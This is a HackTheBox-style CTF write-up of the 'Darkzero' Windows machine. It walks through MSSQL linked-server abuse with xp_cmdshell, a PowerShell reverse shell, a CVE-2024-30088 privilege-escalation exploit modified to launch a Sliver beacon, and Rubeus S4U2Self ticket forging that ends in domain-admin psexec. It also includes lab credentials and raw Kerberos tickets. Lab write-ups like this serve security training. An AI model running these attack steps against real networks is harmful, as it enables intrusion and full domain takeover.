Darkzero is a hard Windows Machine that starts with authenticated access to the DC01 MSSQL server as guest. This MSSQL server was linked to DC02 part of the darkzero.ext domain. By exploiting that trust link between both servers through sql_svc logon credentials, we were able to execute commands on DC02. Using CVE-2024-30088, we could execute a beacon as SYSTEM. Since DC02 was configured for unconstrained delegation, it cached logon credentials of DC01 after logon through the linked servers, which were used through S4U2Self to become domain admin on the darkzero.htb domain. 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-10-06 18:51:46Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
1433/tcp open  ms-sql-s      Microsoft SQL Server 2022 16.00.1000
2179/tcp open  vmrdp?
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

We started by enumerating the domain through rusthound-ce collector and using -ldaps since ldap signing was enabled in the DC

1
$ ~/tools/rusthound-ce -u john.w -p 'RFulUtONCOL!' -i 10.10.11.89 -d darkzero.htb --dns-tcp --ldaps

Furthermore, we could authenticate to the MSSQL server with the initial credentials as guest

1
2
3
4
5
6
7
8
9
10
11
12
$ impacket-mssqlclient darkzero.htb/john.w:'RFulUtONCOL!'@10.10.11.89 -windows-auth 
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232) 
[!] Press help for extra shell commands
SQL (darkzero\john.w  guest@master)>

Linked server

We could not find any interesting data from the dbs

1
2
3
4
5
6
7
8
9
10
SQL (darkzero\john.w  guest@master)> enum_db
name     is_trustworthy_on   
------   -----------------   
master                   0   

tempdb                   0   

model                    0   

msdb                     1

However, we found out a linked server mapped to the DC01 MSSQL server and that uses other local logon credentials instead to authenticate to the linked server

1
2
3
4
5
6
7
8
9
10
SQL (darkzero\john.w  guest@master)> enum_links
SRV_NAME            SRV_PROVIDERNAME   SRV_PRODUCT   SRV_DATASOURCE      SRV_PROVIDERSTRING   SRV_LOCATION   SRV_CAT   
-----------------   ----------------   -----------   -----------------   ------------------   ------------   -------   
DC01                SQLNCLI            SQL Server    DC01                NULL                 NULL           NULL      

DC02.darkzero.ext   SQLNCLI            SQL Server    DC02.darkzero.ext   NULL                 NULL           NULL      

Linked Server       Local Login       Is Self Mapping   Remote Login   
-----------------   ---------------   ---------------   ------------   
DC02.darkzero.ext   darkzero\john.w                 0   dc01_sql_svc

Found that sql_svc has sysdba privs on DC02 

1
2
3
4
SQL (darkzero\john.w  guest@master)> EXEC('SELECT IS_SRVROLEMEMBER(''sysadmin''), IS_SRVROLEMEMBER(''securityadmin''), IS_SRVROLEMEMBER(''dbcreator''), IS_SRVROLEMEMBER(''public'')') AT [DC02.darkzero.ext];
                
-   -   -   -   
1   1   1   1

We could then execute system commands as that mapped svc_sql user, where we can see that we were part of the darkzero.ext domain

1
2
3
4
SQL (darkzero\john.w  guest@master)> EXEC('exec xp_cmdshell ''whoami'' ') AT [DC02.darkzero.ext];
output                 
--------------------   
darkzero-ext\svc_sql

We also enumerated some network information on the linked server

1
2
3
4
5
6
7
8
9
10
SQL (darkzero\john.w  guest@master)> EXEC('exec xp_cmdshell ''ipconfig'' ') AT [DC02.darkzero.ext];
<SNIP>
   Connection-specific DNS Suffix  . :                 

   IPv4 Address. . . . . . . . . . . : 172.16.20.2     

   Subnet Mask . . . . . . . . . . . : 255.255.255.0   

   Default Gateway . . . . . . . . . : 172.16.20.1     
<SNIP>

Another way to enumerate and execute commands on the linked DC02 server is through the use_link command on impacket-mssqlclient specifying the server name of the linked server 

1
2
SQL (darkzero\john.w  guest@master)> use_link "DC02.darkzero.ext"
SQL >"DC02.darkzero.ext" (dc01_sql_svc  dbo@master)>

After testing network connectivity between DC02 and our attacker’s machine which was successful, we used a powershell reverse shell to get a shell on that host

1
xp_cmdshell "powershell.exe -nop -w hidden -enc [base_64_payload]"

DC02 Privilege Escalation

We got the systeminfo file output from the DC02 machine
We then used wes.py as for “windows-exploit-suggester” to find potential CVEs 

1
wes systeminfo.txt -c


Found CVE-2024-30088 as a vulnerability affecting the Windows Kernel due to a missing KB hotfix.
To exploit that vulnerability, we used this POC.
Initially, after compiling the source code and running the POC, we found out that this exploit spawns a new cmd.exe process running in the context of SYSTEM. As a workaround, we changed the source code to instead execute a beacon uploaded on DC02 and get a session as SYSTEM on the sliver-server running locally.

1
CreateProcessFromHandle(hWinLogon, (LPSTR)"C:\\Windows\\system32\\cmd.exe /c C:\\Users\\svc_sql\\Documents\\sliver.exe");

Since we are now Administrator on DC02 which is the DC for darkzero.ext, we know that it is configured by default with Unconstrained Delegation, caching the logon tickets. Since DC01 logs on as a machine account to the linked MSSQL server on DC02, we ran rubeus to get the cached TGT ticket.

1
rubeus -- monitor /interval:10 /service:krbtgt

The DC01$ machine account ticket we obtained previously could be used to authenticate directly to itself as SYSTEM. Therefore, we had to perform S4U2Self to make the DC01$ machine account request a service ticket in behalf of itself for the Administrator on DC01

1
rubeus -i -- s4u /impersonateuser:Administrator /user:DC01$ /self /altservice:cifs/DC01.darkzero.htb /dc:DC01.darkzero.htb /nowrap /ticket:"doIFjDCCBYigAwIBBaEDAgEWooIElDCCBJBhggSMMIIEiKADAgEFoQ4bDERBUktaRVJPLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMREFSS1pFUk8uSFRCo4IETDCCBEigAwIBEqEDAgECooIEOgSCBDbl/rUEnxKazR5HqV3v2WkRS8g/ISYIKVVQ7p8hbGZDgRzMf1gq0nXyINB9ftvSiIFq+BREpt4fdjsIIjP+bg9DNPiE1Q/jyY2OupFWcv8t68tMK3ySDe5JcxcVFzACz+ontRJ19uMiQf+hHU9r7S8IsIhU/XWYL23b/xUU0VDLnFUO0Xq8Vm8hHZKodF67nQROM8Cp5eWSsRwdvuM+HjiKjZdLuJAmipvCKYHW6uQ49R32HywxnKmHp9qGa+4w7hxCm2KhDhXvLPx/N96N5yj9+etC22pADWRbQh+OgTNkJzDBgSi3XOSTXF6oJMdesc+8kyNgKfDpdfpS8o1OPB5oeYVtDU4Sh58N+38PqT7cVlKbhtQjLZArvmjYa7gYUhZweDOlJNizrPobjE389QHJbVFSK8W1C59GL82gNUMKfhcAaBzYPZ5QjRbKvDrQ9IY9GTDMrPbDjKEsfQsFfYar5r8TObXSx7DvzXnnO/hQVc8e7xK2lAkjPS7+0puFls4nYNL5b1oE6PObfgm5198aazALCMg26VmBF6g/Mds4IsbtSZ/N4sQJ9P66+wqbEk0VzjGeVAQaKcXiX7RH+a0XiyRgA/KLpcdyYw6GQaF9q5hZnNT3PHljVlHUNOetRIuXF/S1YB0QuNk0OZRsZlLuXCWo1DINRZiSSDYTcpq9fIRwu5r/9tN6v66QxnTz5Z5Baf4zKIiQSydJZD7G8G8zt1s/Cg6qUpi4r6jKYyOkXbxiMPR7wWtuMCfedDjhJTPk18jY721PwJueHFoc8fN/5DEXCDd8ZE/69P6N8kHxnyp0En+cBHo1letq0XhbWDCFMQDgKa2RNFnkl4MHzJm8rCpzbRAmM6HQPhx8Qu4F4/jgydTdkLzOxW+iyxvUbfUaidNwYSKykq7jQ8rPi8ccgBZy3X27iAl8jnzF9Ow/wHPpb4sULVvUCBqbe+GVxuJuzQ1qckZleJiM/4ORyEaYV7RE+PLLjJeBxzt3K17ll0jDitheJz5zdzHbU0P0ANyxTV3exJBX1Jhw0wjm6RdELdjyiVf/z1fFAB9R5wl496ILZT7cWgmyjntEM4lP3sgkeG8rFMGXe14kKocCrnCWJdbyMWDxyA7IA6NHRi94AXZzGbJSTjzX6AsuN6eVhyFqC8zQur+uV4xdobgeAHoz0I+0gkZFPWiHwUOhuRsNwOHFnta9OmCDpn/y/NybhmENDXUJatcB9aIkX9mJ3xQgU4WCRc88Y9v0/s9w3rnCtBA1570jB6lKsGN9R+GSJS7lZchLdX7E/mP/SEkMHtCZ2AwvD6q3eqLEfFAUcxLFVC2quMoDi2fgFLnNQ8hPg0Z+/l8qb+gvfHn2PaKs9oHAnTEIog/VvkeO9SrOEFb+YzIqwlQU3PI+8auw0a08Q8/+PzftAhI6tJwrA2CgIKozH3xfFBU/o4HjMIHgoAMCAQCigdgEgdV9gdIwgc+ggcwwgckwgcagKzApoAMCARKhIgQg35Ew4HKq8JlAUcWvrBTrrCwO1B6IiIBLM9qk1FwOOQuhDhsMREFSS1pFUk8uSFRCohIwEKADAgEBoQkwBxsFREMwMSSjBwMFAGChAAClERgPMjAyNTEwMDkxODE1MDdaphEYDzIwMjUxMDEwMDQxNTA3WqcRGA8yMDI1MTAxNjE4MTUwN1qoDhsMREFSS1pFUk8uSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxEQVJLWkVSTy5IVEI="

This gave us a CIFS ticket for the Administrator user on DC01 that we could use to authenticate into it

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
[*] rubeus output:

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.2 

[*] Action: S4U

[*] Action: S4U

[*] Building S4U2self request for: 'DC01$@DARKZERO.HTB'
[*] Using domain controller: DC01.darkzero.htb (10.10.11.89)
[*] Sending S4U2self request to 10.10.11.89:88
[+] S4U2self success!
[*] Substituting alternative service name 'cifs/DC01.darkzero.htb'
[*] Got a TGS for 'Administrator' to 'cifs@DARKZERO.HTB'
[*] base64(ticket.kirbi):

      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

We then copied that bas64 ticket into a .b64 file, and converted it to .kirbi as a first step

1
cat dc01.b64| base64 -d > dc01.kirbi

Then, we converted that .kirbi ticket to .ccache to be able to use it as TGT for the Domain admin on DC01

1
2
impacket-ticketConverter dc01.kirbi dc01.ccache 
export KRB5CCNAME=./dc01.ccache

Finally, we were able to authenticate to the domain controller DC01 on darkzero.htb and compromise the domain using that TGT ticket from the previous step

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ impacket-psexec darkzero.htb/administrator@dc01.darkzero.htb -k -no-pass
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on dc01.darkzero.htb.....
[*] Found writable share ADMIN$
[*] Uploading file hcYhFOzy.exe
[*] Opening SVCManager on dc01.darkzero.htb.....
[*] Creating service Hwsi on dc01.darkzero.htb.....
[*] Starting service Hwsi.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.26100.4652]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\System32> hostname
DC01

C:\Windows\System32> whoami
nt authority\system